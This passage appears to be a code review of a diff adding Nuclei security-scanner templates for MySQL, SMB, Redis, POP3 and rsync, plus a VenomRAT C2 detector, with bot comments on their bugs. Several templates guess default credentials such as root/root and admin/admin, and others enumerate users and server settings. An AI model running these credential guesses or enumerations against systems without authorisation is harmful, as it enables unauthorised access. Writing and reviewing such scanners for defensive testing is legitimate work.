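Review bot: There is no `description`, unlike the other MySQL templates in this commit; one sentence such as `Lists the databases visible to an account reached with a guessed default credential.` also makes clear that `severity: high` is about the credential, not the listing. `metadata` has no `max-request` (16 combinations), and the file lacks a trailing newline.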
diff --git a/javascript/enumeration/mysql/mysql-show-variables.yaml b/javascript/enumeration/mysql/mysql-show-variables.yaml
new file mode 100644
index 0000000000..727d251ba8
--- /dev/null
+++ b/javascript/enumeration/mysql/mysql-show-variables.yaml
@@ -0,0 +1,51 @@
+id: mysql-show-variables
+
+info:
+ name: MySQL - Show Variables
+ author: DhiyaneshDk
+ severity: high
+ description: Attempts to show all variables on a MySQL server.
+ reference:
+ - https://nmap.org/nsedoc/scripts/mysql-variables.html
+ metadata:
+ shodan-query: port:3306
+ tags: js,mysql,network,enum
+
+javascript:
+ - code: |
+ let m = require('nuclei/mysql');
+ let c = m.MySQLClient();
+ let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
+ Export(response);
+
+ args:
+ Host: "{{Host}}"
+ Port: "3306"
+ User: "{{usernames}}"
+ Pass: "{{passwords}}"
+ Query: "show variables;"
+
+ payloads:
+ usernames:
+ - root
+ - admin
+ - mysql
+ - test
+ passwords:
+ - root
+ - admin
+ - mysql
+ - test
+ attack: clusterbomb
+
+ stop-at-first-match: true
+ matchers:
+ - type: dsl
+ dsl:
+ - "success == true"
+
+ extractors:
+ - type: json
+ part: response
+ json:
+ - '.Rows[].Variable_name'
\ No newline at end of file
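Review bot: The extractor `.Rows[].Variable_name` drops the value column, so the output is a list of variable names that is essentially identical on every server and does not deliver the "show all variables" the description promises; include the value (`.Rows[] | .Variable_name + "=" + .Value`) or restrict the query to the handful of security-relevant settings such as `secure_file_priv` and `local_infile`. `metadata` lacks `verified` and `max-request` (16 combinations), and the file has no trailing newline.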
diff --git a/javascript/enumeration/mysql/mysql-user-enum.yaml b/javascript/enumeration/mysql/mysql-user-enum.yaml
new file mode 100644
index 0000000000..afc2f3b26c
--- /dev/null
+++ b/javascript/enumeration/mysql/mysql-user-enum.yaml
@@ -0,0 +1,53 @@
+id: mysql-user-enum
+
+info:
+ name: MySQL - User Enumeration
+ author: pussycat0x
+ severity: high
+ description: |
+ Attempts to list all users on a MySQL server.
+ reference:
+ - https://nmap.org/nsedoc/scripts/mysql-users.html
+ metadata:
+ shodan-query: port:3306
+ verified: true
+ tags: js,mysql,network,enum
+
+javascript:
+ - code: |
+ let m = require('nuclei/mysql');
+ let c = m.MySQLClient();
+ let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
+ Export(response);
+
+ args:
+ Host: "{{Host}}"
+ Port: "3306"
+ Query: "SELECT DISTINCT user FROM mysql.user;"
+ User: "{{usernames}}"
+ Pass: "{{passwords}}"
+
+ payloads:
+ usernames:
+ - root
+ - admin
+ - mysql
+ - test
+ passwords:
+ - root
+ - admin
+ - mysql
+ - test
+ attack: clusterbomb
+
+ stop-at-first-match: true
+ matchers:
+ - type: dsl
+ dsl:
+ - "success == true"
+
+ extractors:
+ - type: json
+ part: response
+ json:
+ - '.Rows[].user'
\ No newline at end of file
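Review bot: The JSON extractor keys on `.Rows[].user`, whose case depends on the column name the server returns for the unaliased `user` reference; pinning it with `SELECT DISTINCT user AS user FROM mysql.user;` makes the key independent of that. `metadata` has no `max-request` (16 combinations), and the file has no trailing newline.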
diff --git a/javascript/enumeration/pop3/pop3-capabilities-enum.yaml b/javascript/enumeration/pop3/pop3-capabilities-enum.yaml
new file mode 100644
index 0000000000..aa3ee91fee
--- /dev/null
+++ b/javascript/enumeration/pop3/pop3-capabilities-enum.yaml
@@ -0,0 +1,40 @@
+id: pop3-capabilities-enum
+
+info:
+ name: POP3 Capabilities - Enumeration
+ author: pussycat0x
+ severity: info
+ description: |
+ POP3 capabilities are defined in RFC 2449. The CAPA command allows a client to ask a server what commands it supports and possibly any site-specific policy. Besides the list of supported commands, the IMPLEMENTATION string giving the server version may be available.
+ reference:
+ - https://nmap.org/nsedoc/scripts/pop3-capabilities.html
+ metadata:
+ max-request: 1
+ shodan-query: "port:110"
+ verified: true
+ tags: js,network,pop3,enum
+
+javascript:
+ - code: |
+ let data = "CAPA\r\n"
+ let c = require("nuclei/net");
+ let conn = c.Open('tcp', `${Host}:${Port}`);
+ conn.Send(data);
+ let result = conn.RecvString();
+ let cleanedData = result.replace(/\+OK Dovecot ready\.\r\n\+OK|\r\n|\s/g, " ");
+ Export(cleanedData)
+
+ args:
+ Host: "{{Host}}"
+ Port: 110
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "success == true"
+
+ extractors:
+ - type: dsl
+ name:
+ dsl:
+ - response
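Review bot: The cleanup regex hardcodes `\+OK Dovecot ready\.` so only Dovecot greetings are stripped; any other POP3 server keeps its banner in the exported string, which the description does not mention. `Port: 110` is an unquoted integer while every other template in the commit quotes the port, and the extractor's `name:` is bare (YAML null) — give it a name or drop the key. `let data = "CAPA\r\n"` lacks the semicolon the rest of the script uses, and the connection is never closed after `RecvString()`.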
diff --git a/javascript/enumeration/redis/redis-info.yaml b/javascript/enumeration/redis/redis-info.yaml
new file mode 100644
index 0000000000..4a228a1a74
--- /dev/null
+++ b/javascript/enumeration/redis/redis-info.yaml
@@ -0,0 +1,39 @@
+id: redis-info
+
+info:
+ name: Redis Info - Detect
+ author: DhiyaneshDK
+ severity: info
+ description: |
+ Retrieves information (such as version number and architecture) from a Redis key-value store.
+ reference:
+ - https://nmap.org/nsedoc/scripts/redis-info.html
+ metadata:
+ max-request: 1
+ shodan-query: product:"redis"
+ tags: js,redis,network
+
+javascript:
+ - code: |
+ const redis = require('nuclei/redis');
+ const info = redis.GetServerInfo(Host,Port);
+ Export(info);
+
+ args:
+ Host: "{{Host}}"
+ Port: "6379"
+
+ extractors:
+ - type: regex
+ part: response
+ regex:
+ - redis_version:(\d+\.\d+\.\d+)
+ - os:(.*?)\\r\\n
+ - arch_bits:(\d+)\s+bits
+ - process_id:(\d+)
+ - used_cpu_sys:(\d+\.\d+)
+ - used_cpu_user:(\d+\.\d+)
+ - connected_clients:(\d+)
+ - connected_slaves:(\d+)
+ - used_memory_human:(\d+\.\d+[KMGTPEZY]?)
+ - role:(\w+)
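Review bot: `os:(.*?)\\r\\n` is a plain scalar, so the backslashes are literal and the pattern ends in `\\r\\n`, matching the text sequences `\r` `\n` rather than CR LF — unlike the sibling patterns that use single `\d`/`\s`. If the exported info is a JSON-escaped string that may be intended; otherwise `os:(.*?)\r\n` or `os:([^\r\n]+)` is what was meant, and a comment saying which should accompany it. There is no matcher, so the template reports whenever any regex extracts — acceptable for an info template, but worth a `max-request`-style note that this is unauthenticated INFO output.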
diff --git a/javascript/enumeration/redis/redis-require-auth.yaml b/javascript/enumeration/redis/redis-require-auth.yaml
new file mode 100644
index 0000000000..d87e34fc94
--- /dev/null
+++ b/javascript/enumeration/redis/redis-require-auth.yaml
@@ -0,0 +1,29 @@
+id: redis-require-auth
+
+info:
+ name: Redis Require Authentication - Detect
+ author: DhiyaneshDK
+ severity: info
+ description: |
+ IsAuthenticated checks if the redis server requires authentication
+ reference:
+ - https://docs.projectdiscovery.io/templates/protocols/javascript/modules/redis#isauthenticated
+ metadata:
+ max-request: 1
+ shodan-query: product:"redis"
+ tags: js,redis,network
+
+javascript:
+ - code: |
+ const redis = require('nuclei/redis');
+ const isAuthenticated = redis.IsAuthenticated(Host,Port);
+ Export(isAuthenticated);
+
+ args:
+ Host: "{{Host}}"
+ Port: "6379"
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "success == true"
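Review bot: The matcher is `success == true`, which is satisfied whenever the `IsAuthenticated` call completes, so the template fires on every reachable Redis regardless of the auth state and the exported boolean is never inspected. Match on the exported value (`response == true`, as mysql-default-login does) and decide which state is the finding — the name says "Require Authentication", but a server that does not require it is the security-relevant result (presumably the call returns true when auth is required, per the referenced docs; confirm). The description is the API doc sentence (`IsAuthenticated checks if...`) — describe the finding instead.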
diff --git a/javascript/enumeration/rsync/rsync-version.yaml b/javascript/enumeration/rsync/rsync-version.yaml
new file mode 100644
index 0000000000..e000224e17
--- /dev/null
+++ b/javascript/enumeration/rsync/rsync-version.yaml
@@ -0,0 +1,29 @@
+id: rsync-version
+
+info:
+ name: Rsync Version - Detect
+ author: DhiyaneshDK
+ severity: info
+ description: |
+ Identify the Version of the Rsync Protocol
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: port:"873"
+ tags: js,network,rsync,enum
+
+javascript:
+ - code: |
+ let m = require('nuclei/rsync');
+ let c = m.RsyncClient();
+ let response = c.IsRsync(Host,Port);
+ Export(response);
+
+ args:
+ Host: "{{Host}}"
+ Port: "873"
+
+ extractors:
+ - type: json
+ json:
+ - .Banner
diff --git a/javascript/enumeration/smb/smb-default-creds.yaml b/javascript/enumeration/smb/smb-default-creds.yaml
new file mode 100644
index 0000000000..325a599d14
--- /dev/null
+++ b/javascript/enumeration/smb/smb-default-creds.yaml
@@ -0,0 +1,46 @@
+id: smb-default-creds
+
+info:
+ name: SMB Default Credential - Brutforcing
+ author: pussycat0x
+ severity: high
+ description: |
+ Attempts to guess username/password combinations over SMB.
+ reference:
+ - https://nmap.org/nsedoc/scripts/smb-brute.html
+ metadata:
+ verified: true
+ shodan-query: "port:445"
+ tags: js,network,smb,enum,default
+
+javascript:
+ - code: |
+ var m = require("nuclei/smb");
+ var c = new m.SMBClient();
+ var response = c.ListShares(Host, Port, User, Pass);
+ response;
+
+ args:
+ Host: "{{Host}}"
+ Port: "445"
+ User: "{{usernames}}"
+ Pass: "{{passwords}}"
+
+ attack: clusterbomb
+ payloads:
+ usernames:
+ - 'admin'
+ - 'administrator'
+ - 'guest'
+ passwords:
+ - 'admin'
+ - 'password'
+ - 'guest'
+
+ stop-at-first-match: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'response != "[]"'
+ - 'success == true'
+ condition: and
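Review bot: `name: SMB Default Credential - Brutforcing` → `SMB - Default Credentials`, and the tag list uses `default` while the other credential templates in this commit use `default-login`, so this one is missed by a `default-login` tag filter. `metadata` has no `max-request` (3×3 clusterbomb = 9). The `response != "[]"` check assumes `ListShares` yields a JSON-array string; a one-line comment stating that would save the next reader a lookup.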
diff --git a/javascript/enumeration/smb/smb-enum-domains.yaml b/javascript/enumeration/smb/smb-enum-domains.yaml
new file mode 100644
index 0000000000..39c928c9f5
--- /dev/null
+++ b/javascript/enumeration/smb/smb-enum-domains.yaml
@@ -0,0 +1,41 @@
+id: smb-enum-domains
+
+info:
+ name: SMB - Enum Domains
+ author: DhiyaneshDK
+ severity: info
+ description: |
+ SMB enumeration of domains is often part of the reconnaissance phase, where security professionals or attackers attempt to gather information about the target network to identify potential vulnerabilities.
+ reference:
+ - https://nmap.org/nsedoc/scripts/smb-enum-domains.html
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: port:445
+ tags: js,network,smb,enum
+
+javascript:
+ - code: |
+ var m = require("nuclei/smb");
+ var c = new m.SMBClient();
+ var response = c.ListSMBv2Metadata(Host, Port);
+ Export(response);
+
+ args:
+ Host: "{{Host}}"
+ Port: "445"
+ matchers:
+ - type: dsl
+ dsl:
+ - "len(DNSDomainName) != 0"
+
+ extractors:
+ - type: json
+ internal: true
+ name: DNSDomainName
+ json:
+ - '.DNSDomainName'
+
+ - type: json
+ json:
+ - '"DomainName: "+ .DNSDomainName '
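Review bot: The template makes one unauthenticated `ListSMBv2Metadata` call and extracts `DNSDomainName`, but the description is a generic paragraph about reconnaissance ("security professionals or attackers attempt to gather information"); replace it with what is reported, e.g. `Reads the DNS domain name returned in SMBv2 metadata from an unauthenticated session.` The name `SMB - Enum Domains` overstates a single field; `SMB - DNS Domain Name Disclosure` matches the output. The output extractor `'"DomainName: "+ .DNSDomainName '` carries a trailing space inside the quotes.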
diff --git a/javascript/enumeration/smb/smb-os-detect.yaml b/javascript/enumeration/smb/smb-os-detect.yaml
new file mode 100644
index 0000000000..deb6aa604f
--- /dev/null
+++ b/javascript/enumeration/smb/smb-os-detect.yaml
@@ -0,0 +1,158 @@
+id: smb-os-detect
+
+info:
+ name: SMB Operating System - Detect
+ author: pussycat0x
+ severity: info
+ description: |
+ Detect Operating System
+ reference:
+ - https://nmap.org/nsedoc/scripts/smb-os-discovery.html
+ metadata:
+ shodan-query: "port:445"
+ tags: js,network,smb,enum,os
+
+javascript:
+ - code: |
+ var m = require("nuclei/smb");
+ var c = new m.SMBClient();
+ var response = c.ListSMBv2Metadata(Host, Port);
+ if (response.OSVersion === "6.3.9600") {
+ osInfo = "Windows 8.1";
+ } else if (response.OSVersion === "3.10.511") {
+ osInfo = "Windows NT 3.1";
+ } else if (response.OSVersion === "3.50.807") {
+ osInfo = "Windows NT 3.5";
+ } else if (response.OSVersion === "3.10.528") {
+ osInfo = "Windows NT 3.1, Service Pack 3";
+ } else if (response.OSVersion === "3.51.1057") {
+ osInfo = "Windows NT 3.51";
+ } else if (response.OSVersion === "4.00.950") {
+ osInfo = "Windows 95";
+ } else if (response.OSVersion === "4.00.950A") {
+ osInfo = "Windows 95 OEM Service Release 1";
+ } else if (response.OSVersion === "4.00.950B") {
+ osInfo = "Windows 95 OEM Service Release 2";
+ } else if (response.OSVersion === "4.0.1381") {
+ osInfo = "Windows NT 4.0";
+ } else if (response.OSVersion === "4.00.950B") {
+ osInfo = "Windows 95 OEM Service Release 2.1";
+ } else if (response.OSVersion === "4.00.950C") {
+ osInfo = "OEM Service Release 2.5";
+ } else if (response.OSVersion === "4.10.1998") {
+ osInfo = "Windows 98";
+ } else if (response.OSVersion === "4.10.2222") {
+ osInfo = "Windows 98 Second Edition (SE)";
+ } else if (response.OSVersion === "5.0.2195") {
+ osInfo = "Windows 2000";
+ } else if (response.OSVersion === "4.90.3000") {
+ osInfo = "Windows Me";
+ } else if (response.OSVersion === "5.1.2600") {
+ osInfo = "Windows XP";
+ } else if (response.OSVersion === "5.1.2600.1105-1106") {
+ osInfo = "Windows XP, Service Pack 1";
+ } else if (response.OSVersion === "5.2.3790") {
+ osInfo = "Windows Server 2003";
+ } else if (response.OSVersion === "5.1.2600.2180") {
+ osInfo = "Windows XP, Service Pack 2";
+ } else if (response.OSVersion === "5.2.3790.1180") {
+ osInfo = "Windows Server 2003, Service Pack 1";
+ } else if (response.OSVersion === "5.2.3790") {
+ osInfo = "Windows Server 2003 R2";
+ } else if (response.OSVersion === "6.0.6000") {
+ osInfo = "Windows Vista";
+ } else if (response.OSVersion === "5.2.3790") {
+ osInfo = "Windows Server 2003, Service Pack 2";
+ } else if (response.OSVersion === "5.2.4500") {
+ osInfo = "Windows Home Server";
+ } else if (response.OSVersion === "6.0.6001") {
+ osInfo = "Windows Vista, Service Pack 1";
+ } else if (response.OSVersion === "6.0.6001") {
+ osInfo = "Windows Server 2008";
+ } else if (response.OSVersion === "5.1.2600") {
+ osInfo = "Windows XP, Service Pack 3";
+ } else if (response.OSVersion === "6.0.6002") {
+ osInfo = "Windows Vista, Service Pack 2";
+ } else if (response.OSVersion === "6.0.6002") {
+ osInfo = "Windows Server 2008, Service Pack 2";
+ } else if (response.OSVersion === "6.1.7600") {
+ osInfo = "Windows 7";
+ } else if (response.OSVersion === "6.1.7600") {
+ osInfo = "Windows Server 2008 R2";
+ } else if (response.OSVersion === "6.1.7601") {
+ osInfo = "Windows 7, Service Pack 1";
+ } else if (response.OSVersion === "6.1.7601") {
+ osInfo = "Windows Server 2008 R2, Service Pack ";
+ } else if (response.OSVersion === "6.1.8400") {
+ osInfo = "Windows Home Server 2011";
+ } else if (response.OSVersion === "6.2.9200") {
+ osInfo = "Windows Server 2012";
+ } else if (response.OSVersion === "6.2.9200") {
+ osInfo = "Windows 8";
+ } else if (response.OSVersion === "6.3.9600") {
+ osInfo = "Windows 8.1";
+ } else if (response.OSVersion === "6.3.9600") {
+ osInfo = "Windows Server 2012 R2";
+ } else if (response.OSVersion === "10.0.10240") {
+ osInfo = "Windows 10, Version 1507";
+ } else if (response.OSVersion === "10.0.10586") {
+ osInfo = "Windows 10, Version 1511";
+ } else if (response.OSVersion === "10.0.14393") {
+ osInfo = "Windows 10, Version 1607";
+ } else if (response.OSVersion === "10.0.14393") {
+ osInfo = "Windows Server 2016, Version 1607";
+ } else if (response.OSVersion === "10.0.15063") {
+ osInfo = "Windows 10, Version 1703";
+ } else if (response.OSVersion === "10.0.16299") {
+ osInfo = "Windows 10, Version 1709";
+ } else if (response.OSVersion === "10.0.17134") {
+ osInfo = "Windows 10, Version 1803";
+ } else if (response.OSVersion === "10.0.17763") {
+ osInfo = "Windows Server 2019, Version 1809";
+ } else if (response.OSVersion === "10.0.17763") {
+ osInfo = "Windows 10, Version 1809";
+ } else if (response.OSVersion === "6.0.6003") {
+ osInfo = "Windows Server 2008, Service Pack 2, Rollup KB4489887";
+ } else if (response.OSVersion === "10.0.18362") {
+ osInfo = "Windows 10, Version 1903";
+ } else if (response.OSVersion === "10.0.18363") {
+ osInfo = "Windows 10, Version 1909";
+ } else if (response.OSVersion === "10.0.18363") {
+ osInfo = "Windows Server, Version 1909";
+ } else if (response.OSVersion === "10.0.19041") {
+ osInfo = "Windows 10, Version 2004";
+ } else if (response.OSVersion === "10.0.19041") {
+ osInfo = "Windows Server, Version 2004";
+ } else if (response.OSVersion === "10.0.19042") {
+ osInfo = "Windows 10, Version 20H2";
+ } else if (response.OSVersion === "10.0.19042") {
+ osInfo = "Windows Server, Version 20H2";
+ } else if (response.OSVersion === "10.0.19043") {
+ osInfo = "Windows 10, Version 21H1";
+ } else if (response.OSVersion === "10.0.20348") {
+ osInfo = "Windows Server 2022, Version 21H2";
+ } else if (response.OSVersion === "10.0.22000") {
+ osInfo = "Windows 11, Version 21H2";
+ } else if (response.OSVersion === "10.0.19044") {
+ osInfo = "Windows 10, Version 21H2";
+ } else if (response.OSVersion === "10.0.22621") {
+ osInfo = "Windows 11, Version 22H2";
+ } else if (response.OSVersion === "10.0.19045") {
+ osInfo = "Windows 10, Version 22H2";
+ } else if (response.OSVersion === "10.0.25398") {
+ osInfo = "Windows Server, Version 23H2";
+ } else if (response.OSVersion === "10.0.22631") {
+ osInfo = "Windows 11, Version 23H2";
+ } else if (response.OSVersion !== "0") {
+ osInfo = response.OSVersion;
+ }
+ osInfo;
+
+ args:
+ Host: "{{Host}}"
+ Port: "445"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - response
\ No newline at end of file
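Review bot: Several branches of the `if`/`else if` chain test the same `response.OSVersion` string, so only the first can ever fire: `"6.3.9600"` is compared three times (Windows 8.1 twice, Server 2012 R2 once), `"5.2.3790"` three times, `"4.00.950B"` twice, and every client/server pair such as `"6.1.7600"` (Windows 7 vs Server 2008 R2), `"10.0.14393"` or `"10.0.17763"` silently reports only the client name, which makes the output misleading rather than merely redundant. `osInfo` is also never declared, so on the one input that takes no branch (`OSVersion === "0"`) the trailing `osInfo;` throws a ReferenceError instead of yielding an empty result, and `"Windows Server 2008 R2, Service Pack "` is missing its "1". I would replace the chain with a lookup table that lists every candidate for a shared build number and declares the variable, as sketched below, and add a matcher such as `- type: dsl` / `dsl: ["len(response) != 0"]` so hosts that return nothing do not produce an empty extraction. Whether `ListSMBv2Metadata` returns the build as a plain dotted string, as all the comparisons assume, is not visible here and should be confirmed against the module.
```javascript
var m = require("nuclei/smb");
var c = new m.SMBClient();
var response = c.ListSMBv2Metadata(Host, Port);
// One entry per build string; a build shared by a client and a server
// release lists both instead of dropping the later branch.
var osTable = {
  "4.00.950B": "Windows 95 OEM Service Release 2 / 2.1",
  "5.2.3790": "Windows Server 2003 / 2003 R2 / 2003 SP2",
  "6.0.6001": "Windows Vista SP1 / Windows Server 2008",
  "6.0.6002": "Windows Vista SP2 / Windows Server 2008 SP2",
  "6.1.7600": "Windows 7 / Windows Server 2008 R2",
  "6.1.7601": "Windows 7 SP1 / Windows Server 2008 R2 SP1",
  "6.2.9200": "Windows 8 / Windows Server 2012",
  "6.3.9600": "Windows 8.1 / Windows Server 2012 R2",
  "10.0.14393": "Windows 10 1607 / Windows Server 2016",
  "10.0.17763": "Windows 10 1809 / Windows Server 2019",
  "10.0.18363": "Windows 10 1909 / Windows Server 1909",
  "10.0.19041": "Windows 10 2004 / Windows Server 2004",
  "10.0.19042": "Windows 10 20H2 / Windows Server 20H2",
  // … remaining single-release builds from the original chain, one key each …
};
var osInfo = "";
if (response.OSVersion !== "0") {
  osInfo = osTable[response.OSVersion] || response.OSVersion || "";
}
osInfo;
```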
diff --git a/javascript/enumeration/smb/smb-version-detect.yaml b/javascript/enumeration/smb/smb-version-detect.yaml
new file mode 100644
index 0000000000..6bd0d74f77
--- /dev/null
+++ b/javascript/enumeration/smb/smb-version-detect.yaml
@@ -0,0 +1,33 @@
+id: smb-version-detect
+
+info:
+ name: SMB Version - Detection
+ author: pussycat0x
+ severity: info
+ description: |
+ SMB version detection involves identifying the specific Server Message Block protocol version used by a system or network. This process is crucial for ensuring compatibility and security, as different SMB versions may have distinct features and vulnerabilities.
+ metadata:
+ shodan-query: "port:445"
+ tags: js,network,smb,enum
+
+javascript:
+ - code: |
+ let m = require("nuclei/smb");
+ let c = new m.SMBClient();
+ let response = c.ConnectSMBInfoMode(Host, Port);
+ Export(response);
+
+ args:
+ Host: "{{Host}}"
+ Port: "445"
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "len(smb-version) != 0"
+
+ extractors:
+ - type: json
+ name: smb-version
+ json:
+ - '.Version.VerString'
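Review bot: The matcher `len(smb-version) != 0` references an extractor whose name contains a hyphen; in the DSL expression syntax a hyphen is the subtraction operator, so unless the engine special-cases this name the expression is ambiguous and may never evaluate as intended — rename it to `smb_version` in both the extractor `name:` and the matcher (`- "len(smb_version) != 0"`). The extractor is not marked `internal: true`, which is fine if the version string is meant to be the reported output, but a one-line comment saying so would make the intent clear. Whether `ConnectSMBInfoMode` exposes `.Version.VerString` in its exported JSON is not visible in this diff and should be confirmed against the module's API.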
diff --git a/javascript/enumeration/smb/smb2-server-time.yaml b/javascript/enumeration/smb/smb2-server-time.yaml
new file mode 100644
index 0000000000..3cb9148b8d
--- /dev/null
+++ b/javascript/enumeration/smb/smb2-server-time.yaml
@@ -0,0 +1,38 @@
+id: smb2-server-time
+
+info:
+ name: SMB2 Server Time - Detection
+ author: DhiyaneshDK
+ severity: info
+ description: |
+ Trying to retrieve the present date of the system along with the initiation date of an SMB2 server.
+ reference:
+ - https://nmap.org/nsedoc/scripts/smb2-time.html
+ metadata:
+ shodan-query: "port:445"
+ verified: true
+ tags: js,network,smb,enum
+
+javascript:
+ - code: |
+ var m = require("nuclei/smb");
+ var c = m.SMBClient();
+ var response = c.ConnectSMBInfoMode(Host,Port);
+ var systemTime = new Date(response.NegotiationLog.SystemTime * 1000).toISOString();
+ var serverstartTime = new Date(response.NegotiationLog.ServerStartTime * 1000).toISOString();
+ var result = "SystemTime: " + systemTime + " ServerStartTime: " + serverstartTime;
+ result
+
+ args:
+ Host: "{{Host}}"
+ Port: "445"
+
+ matchers:
+ - type: dsl
+ dsl:
+ - success
+
+ extractors:
+ - type: dsl
+ dsl:
+ - response
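Review bot: `var c = m.SMBClient();` drops the `new` that the sibling SMB templates in this change use (`new m.SMBClient()`), so this template relies on the binding tolerating a plain function call; use `var c = new m.SMBClient();` for consistency. The conversion `new Date(response.NegotiationLog.SystemTime * 1000).toISOString()` assumes both fields are Unix seconds — if the module returns them in any other representation (for example the raw SMB2 FILETIME) the ISO strings will be wrong, so that assumption should be stated in a comment or verified. If negotiation fails, `response.NegotiationLog` is undefined and the property access throws before the `success` matcher can reject the host; a guard that returns an empty string when `response.NegotiationLog` is missing would keep that failure explicit.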
diff --git a/javascript/misconfiguration/mysql/mysql-empty-password.yaml b/javascript/misconfiguration/mysql/mysql-empty-password.yaml
new file mode 100644
index 0000000000..7c9973ea90
--- /dev/null
+++ b/javascript/misconfiguration/mysql/mysql-empty-password.yaml
@@ -0,0 +1,41 @@
+id: mysql-empty-password
+
+info:
+ name: MySQL - Empty Password
+ author: DhiyaneshDk
+ severity: high
+ description: |
+ Checks for MySQL servers with an empty password for root or anonymous.
+ metadata:
+ shodan-query: port:3306
+ tags: js,mssql,network
+
+javascript:
+ - pre-condition: |
+ var m = require("nuclei/mysql");
+ var c = m.MySQLClient();
+ c.IsMySQL(Host, Port);
+
+ code: |
+ var m = require("nuclei/mysql");
+ var c = m.MySQLClient();
+ c.Connect(Host,Port,User,Pass)
+
+ args:
+ Host: "{{Host}}"
+ Port: "3306"
+ User: "{{username}}"
+ Pass: " "
+
+ payloads:
+ usernames:
+ - root
+ - anonymous
+
+ stop-at-first-match: true
+ matchers:
+ - type: dsl
+ dsl:
+ - "response == true"
+ - "success == true"
+ condition: and
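Review bot: The template does not actually test an empty password: `Pass: " "` is a single space, and `User: "{{username}}"` refers to a variable that is never defined because the payload key is `usernames`, so the placeholder is not substituted and the login is not attempted as `root`/`anonymous`. Change these to `Pass: ""` and `User: "{{usernames}}"` so the two payload values are tried with a genuinely empty password, as the description states. The `tags` line also says `mssql` for a MySQL check; it should read `tags: js,mysql,network` (adding `misconfig` to match the directory would be reasonable).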
diff --git a/ssl/c2/venomrat.yaml b/ssl/c2/venomrat.yaml
new file mode 100644
index 0000000000..cb8bfbcf42
--- /dev/null
+++ b/ssl/c2/venomrat.yaml
@@ -0,0 +1,26 @@
+id: venomrat
+
+info:
+ name: VenomRAT - Detect
+ author: pussycat0x
+ severity: info
+ reference:
+ - https://twitter.com/v0lundr_/status/1727277517659353297
+ metadata:
+ verified: "true"
+ max-request: 1
+ fofa-query: cert.issuer.cn="VenomRAT Server"
+ tags: c2,ir,osint,malware,ssl,venomrat
+
+ssl:
+ - address: "{{Host}}:{{Port}}"
+ matchers:
+ - type: word
+ part: issuer_cn
+ words:
+ - "VenomRAT Server"
+
+ extractors:
+ - type: json
+ json:
+ - ".issuer_cn"
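Review bot: `verified: "true"` is written as a quoted string whereas the other templates in this change write the bare boolean `verified: true`; the bare boolean matches the rest of the diff and avoids metadata consumers having to accept both forms. The `info` block also has no `description`, unlike the other templates here; a one-liner such as `description: Detects a VenomRAT C2 server by the self-signed TLS certificate issuer CN "VenomRAT Server".` would make the detection basis explicit.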